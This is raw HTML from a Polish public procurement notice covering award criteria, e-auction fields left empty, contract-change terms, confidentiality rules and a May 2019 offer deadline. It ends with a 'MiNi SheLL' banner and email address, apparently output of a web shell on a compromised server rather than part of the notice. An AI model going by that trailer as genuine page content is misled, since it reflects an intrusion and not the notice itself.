black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena </TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zakres zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy określa wzór umowy stanowiący Załącznik nr B do SIWZ.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">12.17	Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu, zastrzegł, że nie mogą być one udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. W takim przypadku wykonawca oznacza informacje stanowiące tajemnicę przedsiębiorstwa klauzulą ,,tajemnica przedsiębiorstwa - nie udostępniać". Wykonawca nie może zastrzec nazwy (firmy) oraz jego adresu, a także informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w jego ofercie.12.18	Informację stanowiące tajemnicę przedsiębiorstwa powinny być zgrupowane i stanowić oddzielną część oferty, zabezpieczone w kopercie i oznaczone ,,tajemnica przedsiębiorstwa,, </span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-05-06</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:15</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">SIWZ z załącznikami </span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com